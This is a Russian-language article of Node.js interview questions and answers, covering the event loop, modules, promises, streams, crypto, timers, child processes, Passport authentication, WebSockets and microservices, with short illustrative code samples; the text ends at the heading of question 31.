Каждому разработчику рано или поздно приходится сталкиватся с техническими собеседованиями - этим стрессовым испытанием, где решается судьба карьерного роста и зарплатных ожиданий. В этой статье я собрал более 30 реальных вопросов, которые чаще всего встречаются на собеседованиях по Node.js различного уровня — от стажера до архитектора. Для каждого вопроса я привожу не просто сухой ответ, а развернутое объяснение с инсайдерскими деталями, которые помогут вам выделиться среди других кандидатов. Плюс небольшие примеры кода, которые можно использовать для закрепления материала.
Node.js — это не фреймворк и не язык программирования, как многие ошибочно полагают. Это среда выполнения JavaScript на стороне сервера, построенная на движке V8 от Google Chrome. По сути, это такой хитрый способ запустить JS вне браузера и заставить его делать серверные штуки. И хотя Node.js существует уже более 10 лет (с 2009 года), количество связанных с ним вопросов на собеседованиях только растёт. Ключевая фишка Node.js — его событийно-ориентированная архитектура с неблокирующим (non-blocking) вводом-выводом. Проще говоря, он не ждёт, пока завершится одна операция, чтобы начать следующую — он продолжает выполнять код, пока асинхронные операции делают своё дело в фоне. Это как заказать кофе в кафе и вместо того, чтобы стоять у кассы, пока его готовят, пойти занять столик и почитать новости. Когда кофе готов, вас просто окликнут по имени.
Именно эта особенность делает Node.js радикально отличным от таких технологий, как PHP или классический ASP.NET, где каждый запрос создаёт отдельный поток, а при большом количестве запросов система начинает задыхаться. Node.js же обрабатывает тысячи запросов в одном потоке, благодаря Event Loop — той самой магической карусели, которая крутит наши асинхронные события.
| JavaScript | 1
2
3
4
5
6
7
8
9
10
| // Синхронный подход (блокирующий)
const data = fs.readFileSync('/path/to/file');
console.log(data);
console.log('Это выполнится только после чтения файла');
// Асинхронный подход (неблокирующий)
fs.readFile('/path/to/file', (err, data) => {
console.log(data);
});
console.log('Это выполнится еще до того, как файл прочитается'); |
|
process.nextTick() и setImmediate(). Эти нюансы асинхронной работы часто становятся камнем преткновения даже для опытных разработчиков. А вместе с тем, понимание таких основ показывает глубину ваших знаний и отличает вас от десятков других соискателей.
Базовые вопросы
Начнём с базовых вопросов, которые встречаются практически на каждом собеседовании по Node.js. Хоть они и кажутся простыми, именно в них часто скрывается подвох. Интервьюеры любят задавать такие вопросы в начале, чтобы оценить ваш фундамент знаний.
1. Что такое Node.js?
На первый взгляд вопрос примитивный, но не спешите отвечать шаблонно. Многие кандидаты путаются уже здесь, называя Node.js фреймворком или языком программирования.
Ответ: Node.js — это среда выполнения JavaScript на основе движка V8 от Chrome, которая позволяет запускать JavaScript-код на сервере. Она построена на событийно-ориентированной архитектуре с неблокирующим вводом-выводом, что делает её лёгкой и эффективной. Ключевая особенность Node.js — его асинхронность. В отличие от традиционных серверных языков, где каждый запрос порождает новый поток (что дорого с точки зрения памяти), Node.js работает в одном потоке и использует неблокирующие операции ввода-вывода.
2. В чём разница между Node.js и JavaScript?
Этот вопрос часто становится ловушкой для новичков. Некоторые кандидаты начинают сравнивать апельсины с яблоками.
Ответ: JavaScript — это язык программирования, а Node.js — среда выполнения для этого языка за пределами браузера. Если проводить аналогию, JavaScript — это как английский язык, а Node.js — как определенная страна, где на нём говорят, но с собственными диалектами и особенностями. В браузере JavaScript имеет доступ к DOM, window, document и другим браузер-специфичным API. В Node.js этого нет, зато есть доступ к файловой системе, сетевым операциям и другим серверным возможностям через глобальные объекты, такие как process, global и встроенные модули.
| JavaScript | 1
2
3
4
5
6
7
| // В браузере
document.getElementById('myButton');
window.location.href;
// В Node.js
const fs = require('fs');
process.env.NODE_ENV; |
|
3. Является ли Node.js однопоточным?
Ещё один вопрос с подвохом. Многие кандидаты слишком уверенно отвечают "да" и проваливаются.
Ответ: И да, и нет. Event Loop в Node.js действительно работает в одном потоке, но некоторые API Node.js используют дополнительные потоки. Например, модуль crypto для криптографических операций, zlib для сжатия и fs для некоторых файловых операций используют пул потоков (thread pool) из libuv (C-библиотека, которая обрабатывает асинхронные I/O операции в Node.js). Кроме того, с появлением модуля worker_threads в Node.js стала доступна настоящая многопоточность для JavaScript-кода. Так что полностью однопоточным Node.js называть некорректно.
4. Какой тип API-функций поддерживает Node.js?
Ответ: Node.js поддерживает три типа API:
1. Синхронные — блокируют выполнение программы до завершения операции:
| JavaScript | 1
2
| const data = fs.readFileSync('file.txt', 'utf8');
console.log(data); |
|
| JavaScript | 1
2
3
4
| fs.readFile('file.txt', 'utf8', (err, data) => {
if (err) throw err;
console.log(data);
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
| const fsPromises = require('fs').promises;
async function readFileAsync() {
try {
const data = await fsPromises.readFile('file.txt', 'utf8');
console.log(data);
} catch (err) {
console.error(err);
}
} |
|
5. Что такое модуль в Node.js?
Ответ: Модуль в Node.js — это отдельный файл, содержащий связанный код, который может быть использован в других файлах. Node.js использует систему модулей CommonJS (хотя с Node.js 14+ появилась официальная поддержка ES модулей).
В Node.js есть три типа модулей:
1. Встроенные модули — поставляются с Node.js (fs, http, path).
2. Сторонние модули — устанавливаются через npm (express, lodash).
3. Локальные модули — ваши собственные модули.
Пример создания и использования модуля:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
| // файл myModule.js
function sayHello() {
return "Hello, World!";
}
module.exports = { sayHello };
// файл app.js
const myModule = require('./myModule');
console.log(myModule.sayHello()); // "Hello, World!" |
|
6. Что такое npm и его преимущества?
Ответ: npm (Node Package Manager) — это менеджер пакетов для Node.js и одновременно крупнейший в мире репозиторий пакетов с открытым исходным кодом. Основные преимущества npm:- Простота использования и управления зависимостями.
- Огромная экосистема готовых решений.
- Возможность версионирования пакетов.
- Управление скриптами проекта.
- Система публикации и скачивания пакетов.
npm стал неотъемлемой частью экосистемы JavaScript и используется не только для серверной разработки, но и для фронтенда. Ну а еще он периодически ломается в самый неподходящий момент, как и любой другой инструмент, который мы любим, но иногда проклинаем.
7. Что такое middleware?
Ответ: Middleware (промежуточное ПО) — это функции, которые имеют доступ к объекту запроса (req), объекту ответа (res) и следующей функции middleware в цикле обработки запроса-ответа (next). В Node.js, особенно в контексте Express.js, middleware выполняет задачи вроде:- Выполнение кода.
- Изменение объектов запроса и ответа.
- Завершение цикла запрос-ответ.
- Вызов следующего middleware в стеке.
| JavaScript | 1
2
3
4
5
| // Пример middleware в Express
app.use((req, res, next) => {
console.log('Запрос получен в:', Date.now());
next(); // Передает управление следующему middleware
}); |
|
next() в Express.
8. Как Node.js справляется с конкурентностью, несмотря на однопоточность?
Ответ: Node.js использует событийную модель с асинхронным неблокирующим I/O, основанную на Event Loop. Когда происходит I/O операция (чтение файла, запрос к БД, HTTP-запрос), Node.js не блокирует выполнение, а регистрирует колбэк и продолжает обрабатывать другие события. Когда операция завершается, Event Loop добавляет колбэк в очередь задач, которая будет обработана, когда стек вызовов будет пуст. Этот подход позволяет одному потоку обрабатывать тысячи параллельных соединений без создания для каждого из них отдельного потока, что делает Node.js исключительно эффективным для I/O-интенсивных задач. Однако для CPU-интенсивных операций этот подход не идеален, что привело к появлению решений вроде worker_threads.
9. Что такое control flow в Node.js?
Ответ: Control flow (управление потоком) в Node.js — это управление порядком выполнения асинхронных операций. В силу асинхронной природы Node.js, код часто выполняется не последовательно сверху вниз, что создает сложности в контроле потока выполнения. Существует несколько подходов к управлению потоком в Node.js:
1. Колбэки — классический подход,
2. Промисы (Promises) — более современный и читаемый подход,
3. Async/await — синтаксический сахар над промисами,
4. Библиотеки Control Flow (например, async.js).
Неправильное управление потоком может привести к race conditions, утечкам памяти и другим труднодиагностируемым проблемам. Поэтому на это обращают особое внимание на собеседованиях.
10. Что означает Event Loop в Node.js?
Ответ: Event Loop (цикл событий) — сердце асинхронного неблокирующего I/O в Node.js. Это механизм, который позволяет Node.js выполнять неблокирующие операции ввода-вывода, несмотря на то, что JavaScript однопоточный.
Event Loop постоянно проверяет, есть ли события, которые нужно обработать, и добавляет их в очередь. Как только стек вызовов пуст, Event Loop берет первое событие из очереди и обрабатывает его. Это продолжается до тех пор, пока очередь не опустеет. Упрощенно цикл событий работает следующим образом:
1. Добавление колбэков в очередь.
2. Выбор первого колбэка из очереди.
3. Выполнение колбэка до завершения.
4. Повторение шагов 2 и 3, пока очередь не опустеет.
5. Ожидание новых колбэков.
Детальное понимание Event Loop критически важно для оптимизации производительности Node.js-приложений и диагностики проблем. Это тот вопрос, на который можно отвечать часами, но я советую подготовить 2-3-минутный ответ с конкретными примерами.
Не запускается пакет node js - пакетами? npm? сам node? gulp?
Всем доброго времени суток.
Есть такая проблема, пытаюсь перебраться на Linux (Ubuntu) Установил... Выложил приложение Node js на хост, ошибка (node:12900) [DEP0005] DeprecationWarning: Buffer()
Выложил приложение Node js на хост, ошибка (node:12900) DeprecationWarning: Buffer() is deprecated... Не могу с решениями задач на node js (я понимаю как их решить на js, но как на node js не знаю)
1) Однажды ковбой Джо решил обзавестись револьвером и пришёл в оружейный магазин. У ковбоя s... Как удалить элемент нумерованного списка средствами интерфейса NODE?
Как удалить элемент нумерованного списка средствами интерфейса NODE??(элементы списка вводим в поле...
11. Каковы основные недостатки Node.js?
Ответ: Как бы я ни любил Node.js, нужно признать его ограничения. Основные недостатки:
Проблемы с CPU-интенсивными задачами: Однопоточная природа делает Node.js неэффективным для тяжёлых вычислений. Помню проект, где мы пытались реализовать графический редактор на Node.js — это была катастрофа, пока не вынесли обработку изображений в отдельный сервис.
Callback Hell: Хотя современные решения (Promises, async/await) сгладили эту проблему, многие библиотеки всё ещё используют колбэки, что может привести к нечитаемому коду:
| JavaScript | 1
2
3
4
5
6
7
| getData(function(a) {
getMoreData(a, function(b) {
getEvenMoreData(b, function(c) {
// это и называется "колбэк-ад"
});
});
}); |
|
Постоянные изменения API: Эволюция Node.js иногда приводит к нарушению обратной совместимости. Один мой клиент почти потерял выходные, когда после обновления Node.js с 12 до 14 версии их прод-система просто отказалась запускаться.
12. Что такое REPL в Node.js?
Ответ: REPL (Read-Eval-Print Loop) — интерактивная среда, которая позволяет вводить JavaScript-выражения, интерпретировать их и выводить результат. Грубо говоря, это как консоль в браузере, только для Node.js. Запускается просто: введите node в командной строке без аргументов, и перед вами появится приглашение >:
| Bash | 1
2
3
4
5
6
7
8
| $ node
> const greeting = 'Hello, world!';
undefined
> console.log(greeting);
Hello, world!
undefined
> greeting.split('').reverse().join('');
'!dlrow ,olleH' |
|
13. Как импортировать модуль в Node.js?
Ответ: В Node.js существует две системы модулей: CommonJS (традиционная) и ES Modules (более новая). Способ импорта зависит от выбранной системы:
1. CommonJS (по умолчанию до Node.js 14):
| JavaScript | 1
2
3
4
5
6
7
8
| // Импорт встроенного модуля
const fs = require('fs');
// Импорт стороннего модуля (установленного через npm)
const express = require('express');
// Импорт локального модуля
const myModule = require('./myModule'); |
|
.mjs расширения или "type": "module" в package.json):
| JavaScript | 1
2
3
4
5
6
7
8
| // Импорт встроенного модуля
import fs from 'fs';
// Импорт отдельной функции
import { readFile } from 'fs/promises';
// Импорт локального модуля
import myModule from './myModule.js'; |
|
import/export — единственный правильный способ, не понимая, что большинство Node.js-проектов все еще используют CommonJS.
14. В чём разница между Node.js и AJAX?
Ответ: Сравнивать Node.js и AJAX — это как сравнивать автомобиль и рулевое колесо. Это вещи разного порядка:
Node.js — серверная среда выполнения JavaScript.
AJAX (Asynchronous JavaScript and XML) — технология, позволяющая веб-страницам асинхронно обмениваться данными с сервером без перезагрузки страницы.
Node.js используется для создания серверных приложений, а AJAX — клиентская технология, используемая в браузере. Однако часто они работают вместе: фронтенд использует AJAX для отправки запросов к серверу на Node.js.
| JavaScript | 1
2
3
4
5
6
7
8
9
| // Клиентский AJAX (в браузере)
fetch('/api/data')
.then(response => response.json())
.then(data => console.log(data));
// Серверная часть на Node.js
app.get('/api/data', (req, res) => {
res.json({ message: 'Hello from Node.js!' });
}); |
|
15. Что такое package.json в Node.js?
Ответ: package.json — это манифест-файл в корне Node.js проекта, который содержит метаданные о проекте и, самое главное, список зависимостей. Это своего рода ДНК вашего проекта. Основные секции package.json:
name, version: идентификаторы пакета,
dependencies: зависимости для продакшена,
devDependencies: зависимости для разработки,
scripts: команды для запуска через npm,
main: точка входа в приложение,
engines: требуемые версии Node.js/npm,
type: система модулей (commonjs или module).
| JSON | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| {
"name": "my-awesome-project",
"version": "1.0.0",
"main": "index.js",
"dependencies": {
"express": "^4.17.1"
},
"devDependencies": {
"jest": "^27.0.6"
},
"scripts": {
"start": "node index.js",
"test": "jest"
}
} |
|
dependencies и devDependencies часто игнорируется, что может привести к раздутым образам Docker в продакшене. Помню случай, когда неправильное управление зависимостями привело к увеличению размера контейнера на 500MB!
16. Какие популярные фреймворки Node.js используются в наши дни?
Ответ: В мире Node.js существует несколько доминирующих фреймворков, каждый со своими преимуществами:
1. Express.js — минималистичный и гибкий. Самый популярный выбор для REST API и небольших приложений.
2. NestJS — мощный фреймворк с архитектурой, вдохновленной Angular, использует TypeScript. Идеален для корпоративных приложений.
3. Koa.js — создан той же командой, что и Express, но с акцентом на асинхронность через async/await.
4. Fastify — ориентирован на скорость и низкие накладные расходы, отличная альтернатива Express для высоконагруженных API.
5. Meteor — полноценный фреймворк для создания веб и мобильных приложений.
Выбор фреймворка зависит от задачи. На последнем проекте мы начали с Express, но в процессе роста кодовой базы перешли на NestJS, что спасло нас от хаоса в архитектуре.
17. Что такое промисы в Node.js?
Ответ: Промисы (Promises) — это объекты, представляющие результат асинхронной операции, который может быть доступен сейчас, позже или никогда. Они помогают избежать глубокой вложенности колбэков и делают асинхронный код линейным и читаемым. Промис находится в одном из трёх состояний:
Pending (ожидание): начальное состояние,
Fulfilled (выполнено): операция завершена успешно,
Rejected (отклонено): операция завершена с ошибкой.
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| // Создание промиса
const myPromise = new Promise((resolve, reject) => {
setTimeout(() => {
if (Math.random() > 0.5) {
resolve('Успех!');
} else {
reject(new Error('Что-то пошло не так'));
}
}, 1000);
});
// Использование промиса
myPromise
.then(result => console.log(result))
.catch(error => console.error(error))
.finally(() => console.log('Завершено')); |
|
async/await код стал еще читабельнее:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
| async function myFunction() {
try {
const result = await myPromise;
console.log(result);
} catch (error) {
console.error(error);
} finally {
console.log('Завершено');
}
} |
|
async/await выглядит синхронно, под капотом это всё те же промисы и Event Loop не блокируется.
18. Что такое событийно-ориентированное программирование в Node.js?
Ответ: Событийно-ориентированное программирование — это парадигма, в которой поток выполнения программы определяется событиями (клики, сетевые запросы, таймеры). Node.js строится вокруг этой парадигмы через модуль EventEmitter. Практически всё в Node.js основано на событиях: HTTP-сервер испускает событие при получении запроса, поток данных (stream) испускает событие, когда данные доступны, и так далее.
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
| const EventEmitter = require('events');
// Создаём эмиттер
const myEmitter = new EventEmitter();
// Регистрируем обработчик события
myEmitter.on('event', (arg1, arg2) => {
console.log('Событие с аргументами:', arg1, arg2);
});
// Генерируем событие
myEmitter.emit('event', 'первый аргумент', 'второй аргумент'); |
|
19. Что такое буфер в Node.js?
Ответ: Buffer в Node.js — это класс для работы с бинарными данными напрямую. В отличие от JavaScript в браузере, где работа с бинарными данными ограничена, Node.js предоставляет Buffer для эффективной обработки бинарных потоков, чтения файлов, сетевых операций и т.д.
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
| // Создание буфера
const buf1 = Buffer.alloc(10); // Создаёт буфер размером 10 байт, заполненный нулями
const buf2 = Buffer.from('Hello world'); // Создаёт буфер из строки
const buf3 = Buffer.from([1, 2, 3]); // Создаёт буфер из массива
// Преобразование буфера в другие форматы
console.log(buf2.toString()); // 'Hello world'
console.log(buf2.toJSON()); // { type: 'Buffer', data: [72, 101, 108, 108, 111, ...] }
// Запись в буфер
buf1.write('Hey!'); |
|
20. Что такое потоки в Node.js?
Ответ: Потоки (Streams) — это абстракция для работы с данными, особенно с большими объёмами данных, которые не могут или не должны загружаться в память целиком. Они позволяют обрабатывать данные по частям, что существенно снижает использование памяти. Существуют четыре типа потоков:
Readable — поток для чтения (HTTP-запросы, чтение файла),
Writable — поток для записи (HTTP-ответы, запись в файл),
Duplex — поток для чтения и записи (TCP-сокеты),
Transform — преобразующий поток (компрессия данных).
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
| const fs = require('fs');
// Пример потоковой обработки большого файла
const readStream = fs.createReadStream('bigfile.txt');
const writeStream = fs.createWriteStream('output.txt');
// Пайпим данные из одного потока в другой
readStream.pipe(writeStream);
// Обработка событий
readStream.on('data', (chunk) => {
console.log(`Получен ${chunk.length} байт данных`);
});
readStream.on('end', () => {
console.log('Чтение завершено');
}); |
|
Продвинутые вопросы
Переходим к более мясистым темам. Эти вопросы чаще задают на позиции мидл+ и старших разработчиков. Если вы претендуете на такую должность, эти вопросы должны быть у вас в мозгу как таблица умножения.
21. Объясните криптомодуль в Node.js
Ответ: Модуль crypto в Node.js — это обёртка над OpenSSL, предоставляющая криптографические функции для шифрования данных, создания хешей, подписей и работы с сертификатами. Этот модуль критически важен для безопасности приложений. Основные возможности включают:- Хеширование (MD5, SHA-1, SHA-256 и др.).
- Шифрование/дешифрование данных.
- Создание цифровых подписей..
- Генерация случайных чисел.
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
| const crypto = require('crypto');
// Создание хеша
function hashPassword(password) {
const salt = crypto.randomBytes(16).toString('hex');
const hash = crypto.pbkdf2Sync(password, salt, 10000, 64, 'sha512').toString('hex');
return { salt, hash };
}
// Проверка пароля
function verifyPassword(password, salt, hash) {
const calculatedHash = crypto.pbkdf2Sync(password, salt, 10000, 64, 'sha512').toString('hex');
return calculatedHash === hash;
}
// Шифрование данных
function encryptData(data, key) {
const iv = crypto.randomBytes(16);
const cipher = crypto.createCipheriv('aes-256-cbc', key, iv);
let encrypted = cipher.update(data, 'utf8', 'hex');
encrypted += cipher.final('hex');
return { iv: iv.toString('hex'), encrypted };
} |
|
22. Что такое callback hell и как его избежать?
Ответ: Callback hell (или пирамида судьбы) — это ситуация, когда код с множеством вложенных колбэков становится нечитаемым и трудно поддерживаемым. Обычно такой код имеет характерную треугольную форму из-за отступов:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
| getData(function(a) {
getMoreData(a, function(b) {
getEvenMoreData(b, function(c) {
getYetEvenMoreData(c, function(d) {
getFinalData(d, function(finalData) {
// Код, до которого тяжело добраться
});
});
});
});
}); |
|
1. Промисы (Promises) — делают асинхронный код более линейным:
| JavaScript | 1
2
3
4
5
6
7
8
9
| getData()
.then(a => getMoreData(a))
.then(b => getEvenMoreData(b))
.then(c => getYetEvenMoreData(c))
.then(d => getFinalData(d))
.then(finalData => {
// Гораздо читабельнее
})
.catch(error => console.error(error)); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
| async function getAllData() {
try {
const a = await getData();
const b = await getMoreData(a);
const c = await getEvenMoreData(b);
const d = await getYetEvenMoreData(c);
const finalData = await getFinalData(d);
// Код читается сверху вниз как обычный синхронный
} catch (error) {
console.error(error);
}
} |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
| function handleFinalData(finalData) {
// Обработка финальных данных
}
function getDataStep4(c) {
getYetEvenMoreData(c, function(d) {
getFinalData(d, handleFinalData);
});
}
// И так далее для каждого шага |
|
23. Объясните назначение модуля timers в Node.js
Ответ: Модуль timers в Node.js предоставляет функции для выполнения кода после определенного периода времени. Этот модуль интегрирован в глобальное пространство имен, поэтому его не нужно импортировать.
Основные функции:
setTimeout(callback, delay, [...args]) — выполнит callback через delay миллисекунд,
clearTimeout(timeout) — отменяет таймер,
setInterval(callback, delay, [...args]) — выполняет callback регулярно каждые delay миллисекунд,
clearInterval(interval) — отменяет интервал,
setImmediate(callback, [...args]) — выполнит callback в следующем цикле событий,
clearImmediate(immediate) — отменяет immediate.
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| // Пример использования
const delayedFunction = setTimeout(() => {
console.log('Выполнится через 2 секунды');
}, 2000);
// При необходимости можно отменить выполнение
// clearTimeout(delayedFunction);
// Создание повторяющейся задачи
let counter = 0;
const intervalId = setInterval(() => {
console.log(`Прошло ${++counter} секунд`);
if (counter >= 5) {
clearInterval(intervalId); // Остановка после 5 итераций
}
}, 1000);
// Выполнение в следующем тике цикла событий
setImmediate(() => {
console.log('Это выполнится после всего синхронного кода');
}); |
|
setTimeout(fn, 0) не означает, что функция будет вызвана ровно через 0 мс — она выполнится, как только стек вызовов освободится.
24. В чём разница между setImmediate() и process.nextTick()?
Ответ: Это тот вопрос, на котором спотыкаются даже опытные разработчики. Оба метода откладывают выполнение функции, но делают это по-разному:
process.nextTick() добавляет колбэк в "очередь nextTick", которая обрабатывается после завершения текущей операции, но до того, как цикл событий продолжит свою работу. То есть между фазами цикла событий.
setImmediate() ставит колбэк в очередь на специальную фазу цикла событий, которая выполняется после ввода-вывода.
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
| console.log('Начало');
process.nextTick(() => {
console.log('process.nextTick #1');
});
setImmediate(() => {
console.log('setImmediate #1');
process.nextTick(() => {
console.log('process.nextTick внутри setImmediate');
});
});
process.nextTick(() => {
console.log('process.nextTick #2');
});
setImmediate(() => {
console.log('setImmediate #2');
});
console.log('Конец');
// Вывод:
// Начало
// Конец
// process.nextTick #1
// process.nextTick #2
// setImmediate #1
// process.nextTick внутри setImmediate
// setImmediate #2 |
|
process.nextTick() имеет более высокий приоритет и вызывается раньше, чем любые другие асинхронные события, включая Promises. Это может создавать проблему "голодания ввода-вывода", когда при рекурсивном использовании nextTick другие события блокируются на неопределенное время.
Пару месяцев назад мы расследовали проблему задержек в приложении, и оказалось, что кто-то использовал process.nextTick() в рекурсивном цикле для обработки большого набора данных — процессор загружался на 100%, но серверу не хватало ресурсов для обработки входящих запросов!
25. В чём разница между setTimeout() и setImmediate()?
Ответ: Путаница между `setTimeout(fn, 0)` и setImmediate(fn) — ещё одна классическая ловушка в Node.js:
setTimeout(fn, 0) теоретически должен выполнить функцию как можно скорее после указанного задержки (в данном случае 0 мс), но фактически она будет добавлена в очередь таймеров, которая обрабатывается в начале цикла событий.
setImmediate() выполняет функцию в фазе проверки (check phase) цикла событий, сразу после завершения операций ввода-вывода.
| JavaScript | 1
2
3
4
5
6
7
8
| // Этот код может вывести результаты в разном порядке при разных запусках
setTimeout(() => {
console.log('setTimeout');
}, 0);
setImmediate(() => {
console.log('setImmediate');
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| const fs = require('fs');
fs.readFile(__filename, () => {
setTimeout(() => {
console.log('setTimeout');
}, 0);
setImmediate(() => {
console.log('setImmediate');
});
});
// Вывод всегда:
// setImmediate
// setTimeout |
|
setImmediate всегда выполняется перед таймерами, поскольку фаза проверки происходит сразу после завершения колбэков ввода-вывода, а таймеры проверяются на следующем цикле.
26. В чём разница между методами spawn() и fork() в модуле child_process?
Ответ: Оба метода используются для создания дочерних процессов в Node.js, но имеют существенные различия:
spawn() запускает новый процесс с указанной командой. Он предназначен для длительно работающих процессов, возвращает поток (stream) и не создает новый V8-экземпляр.
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| const { spawn } = require('child_process');
const ls = spawn('ls', ['-la']);
ls.stdout.on('data', (data) => {
console.log(`stdout: ${data}`);
});
ls.stderr.on('data', (data) => {
console.error(`stderr: ${data}`);
});
ls.on('close', (code) => {
console.log(`Процесс завершён с кодом: ${code}`);
}); |
|
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| // parent.js
const { fork } = require('child_process');
const child = fork('./child.js');
child.on('message', (message) => {
console.log('Родитель получил сообщение:', message);
});
child.send({ hello: 'от родителя' });
// child.js
process.on('message', (message) => {
console.log('Дочерний процесс получил:', message);
process.send({ echo: message });
}); |
|
fork() создаёт новый экземпляр V8 и Node.js, что занимает больше памяти, но позволяет выполнять JavaScript-код. spawn() просто создаёт новый процесс для выполнения указанной команды.
27. Объясните использование модуля passport в Node.js
Ответ: Passport — популярная middleware библиотека для аутентификации в Node.js приложениях, особенно с Express. Её главное преимущество — модульность и поддержка различных стратегий аутентификации через единый согласованный API.
Основные концепции Passport:
Стратегии — модули для разных методов аутентификации (локальная, OAuth, JWT и т.д.),
Сессии — механизм сохранения состояния пользователя между запросами,
Middleware — функции для проверки аутентификации и авторизации.
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
| const express = require('express');
const passport = require('passport');
const LocalStrategy = require('passport-local').Strategy;
const session = require('express-session');
const app = express();
// Настройка сессий
app.use(session({
secret: 'mysecretkey',
resave: false,
saveUninitialized: false
}));
// Инициализация Passport
app.use(passport.initialize());
app.use(passport.session());
// Настройка локальной стратегии
passport.use(new LocalStrategy(
(username, password, done) => {
// Здесь был бы запрос к БД
if (username === 'admin' && password === 'password') {
return done(null, { id: 1, username: 'admin' });
}
return done(null, false, { message: 'Неверные учетные данные' });
}
));
// Сериализация и десериализация пользователя
passport.serializeUser((user, done) => {
done(null, user.id);
});
passport.deserializeUser((id, done) => {
// Здесь был бы запрос к БД
if (id === 1) {
done(null, { id: 1, username: 'admin' });
} else {
done(new Error('Пользователь не найден'));
}
});
// Маршрут для логина
app.post('/login', passport.authenticate('local', {
successRedirect: '/dashboard',
failureRedirect: '/login',
failureFlash: true
}));
// Защищенный маршрут
app.get('/dashboard', isAuthenticated, (req, res) => {
res.send(`Привет, ${req.user.username}!`);
});
// Middleware проверки аутентификации
function isAuthenticated(req, res, next) {
if (req.isAuthenticated()) {
return next();
}
res.redirect('/login');
} |
|
28. Что такое fork в контексте репозитория?
Ответ: В контексте систем контроля версий (Git, GitHub, GitLab и т.д.), fork — это копия репозитория, которая позволяет свободно экспериментировать с изменениями, не затрагивая оригинальный проект. Форк даёт возможность:- Предлагать изменения в проекты, к которым у вас нет прямого доступа на запись.
- Использовать чужой проект как отправную точку для собственных идей.
- Проверять как определенные изменения повлияют на проект перед внесением их в основную ветку.
Процесс обычно выглядит так:
1. Создать форк репозитория (через интерфейс GitHub/GitLab).
2. Клонировать форк локально.
3. Внести изменения и отправить их в свой форк.
4. Создать Pull Request (PR) в оригинальный репозиторий.
Хотя этот вопрос больше связан с Git, чем с Node.js напрямую, он часто возникает в контексте работы над Node.js проектами и модулями.
В моей практике, кстати, тщательная проверка вклада кандидата в open-source проекты часто даёт больше информации о его реальных навыках, чем десяток вопросов на алгоритмы. Умение грамотно создавать PRы, писать тесты и документацию — признаки действительно зрелого разработчика.
29. Как работают веб-сокеты в Node.js?
Ответ: WebSockets — это протокол, обеспечивающий полнодуплексную связь (двунаправленную одновременную) между клиентом и сервером по одному долгоживущему соединению. В отличие от HTTP, где клиент всегда инициирует запрос, WebSockets позволяют серверу отправлять данные клиенту без дополнительных запросов.
В Node.js для работы с WebSockets чаще всего используется библиотека Socket.IO или ws:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| // Сервер с Socket.IO
const express = require('express');
const http = require('http');
const socketIo = require('socket.io');
const app = express();
const server = http.createServer(app);
const io = socketIo(server);
io.on('connection', (socket) => {
console.log('Новое соединение');
// Обработка событий от клиента
socket.on('message', (data) => {
console.log('Получено сообщение:', data);
// Отправка ответа
socket.emit('response', { status: 'ok', message: 'Получено!' });
// Отправка всем клиентам кроме отправителя
socket.broadcast.emit('broadcast', { message: 'Новое сообщение!' });
// Отправка всем клиентам включая отправителя
io.emit('globalEvent', { message: 'Всем привет!' });
});
socket.on('disconnect', () => {
console.log('Соединение закрыто');
});
});
server.listen(3000, () => {
console.log('Сервер запущен на порту 3000');
}); |
|
30. Объясните концепцию микросервисной архитектуры в Node.js
Ответ: Микросервисная архитектура — подход к разработке, при котором приложение строится как набор небольших, слабо связанных сервисов, каждый из которых отвечает за конкретную бизнес-функцию и может быть разработан, развёрнут и масштабирован независимо. Node.js идеально подходит для микросервисов благодаря своей лёгкости, эффективности работы с I/O и богатой экосистеме инструментов для построения API. Основные принципы микросервисной архитектуры:
Независимость сервисов — каждый микросервис может быть разработан, обновлён и масштабирован отдельно,
Децентрализация данных — каждый сервис имеет собственное хранилище данных,
Общение через API — взаимодействие сервисов происходит через сетевые протоколы,
Отказоустойчивость — сбой в одном сервисе не вызывает каскадного отказа всей системы.
Вот пример примитивного микросервиса на Node.js:
| JavaScript | 1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
| // user-service.js - Микросервис управления пользователями
const express = require('express');
const app = express();
app.use(express.json());
const users = []; // В реальном проекте здесь была бы БД
app.post('/users', (req, res) => {
const user = {
id: Date.now().toString(),
name: req.body.name,
email: req.body.email
};
users.push(user);
res.status(201).json(user);
});
app.get('/users/:id', (req, res) => {
const user = users.find(u => u.id === req.params.id);
if (!user) return res.status(404).send('Пользователь не найден');
res.json(user);
});
app.listen(3001, () => console.log('Сервис пользователей запущен на порту 3001')); |
|
На прошлом проекте наша команда мигрировала с монолита на микросервисы, и самым сложным оказалось не создание самих сервисов, а настройка эффективной мониторинг-системы. Без трассировки запросов через множество сервисов отладка превратилась в настоящий кошмар. Так что не забывайте про наблюдаемость (observability) в микросервисной архитектуре!
31. Как работает кластеризация в Node.js?
